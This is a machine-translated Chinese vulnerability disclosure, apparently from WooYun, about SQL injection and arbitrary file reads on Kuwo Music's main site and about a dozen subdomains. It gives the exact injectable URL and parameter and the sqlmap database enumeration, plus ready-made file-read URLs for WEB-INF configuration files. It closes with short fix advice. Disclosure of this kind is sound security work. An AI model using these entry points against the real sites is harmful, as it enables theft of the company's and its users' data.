酷我主站及十多个分站SQL注入+文件读取

漏洞标题 酷我主站及十多个分站SQL注入+文件读取 相关厂商 酷我音乐 漏洞作者 pandas 提交时间 2016-06-21 16:06 公开时间 2016-06-27 09:39 漏洞类型 SQL…

漏洞标题 酷我的主站和10多个子站SQL注入+文件读取 相关制造商 kuwo音乐 漏洞作者 熊猫 提交时间 2016-06-21 16: 06 公共时间 2016-06-27 09: 39 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 15 漏洞状态 该漏洞已通知供应商,但供应商忽略了该漏洞 标签标签 漏洞详细信息 漏洞网站统计信息: http://yule.kuwo.cn/ http://kappa.kuwo.cn/ http://huodong.kuwo.cn/ http://album.kuwo.cn/ http://playlist.kuwo.cn/ http://play.kuwo.cn/ http://changba.kuwo.cn/ http://www.kuwo.cn/ http://tupian.kuwo.cn/ http://hbtv.kuwo.cn/ http://gxtv.kuwo.cn/ http://yinyue.kuwo.cn/ 目前,连接上述主站的12个站点受到影响,可能存在遗漏。 A. SQL注入: http://www.kuwo.cn/huodong/wanmei/xianglong/getAllWork?orderby=flowers&huodongName=wanmeixianglong&curpager=1 漏洞参数: orderby SQLMAP可以运行数据:

涉及21个数据库: 可用数据库[21]: [*] ACT [*]贝尔 [*]咖啡厅 [*] CONCERT [*] CROWD_FUNDING [*] information_schema [*] KGE [*] KGE_ACT [*] KGECOMMENT [*] KW_TV [*] LISTEN_STORY [*] MANYOU [*] mysql [*]新闻 [*] performance_schema [*] RESWIKI [*]发言人 [*]统计 [*] TAOBAO [*]测试 [*]雅虎 其余站点可以使用sqlmap运行数据,相同的漏洞点,使用SQLMAP证书:

漏洞证明: 其次,读取文件 这是一个历史问题。以前曾提交过白帽,但制造商一直在修复。 主要网站: http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/web.xml?&pn=0&subid=142

http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/classes/config.properties?&pn=0&subid=142

http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/classes/log4j.properties?&pn=0&subid=142

同样,其他子站点也存在文件读取漏洞,供应商仍在尝试修复它们。 修理计划: 1. SQL注入:对orderby参数进行严格的顺序过滤; 2.文件读取:组合此功能点以确定是否跨目录读取文件。或者使用一种愚蠢的方式来判断诸如./,WEB-INF,jsp $(jsp end)之类的文件是不可读的。 版权声明:请注明源熊猫@乌云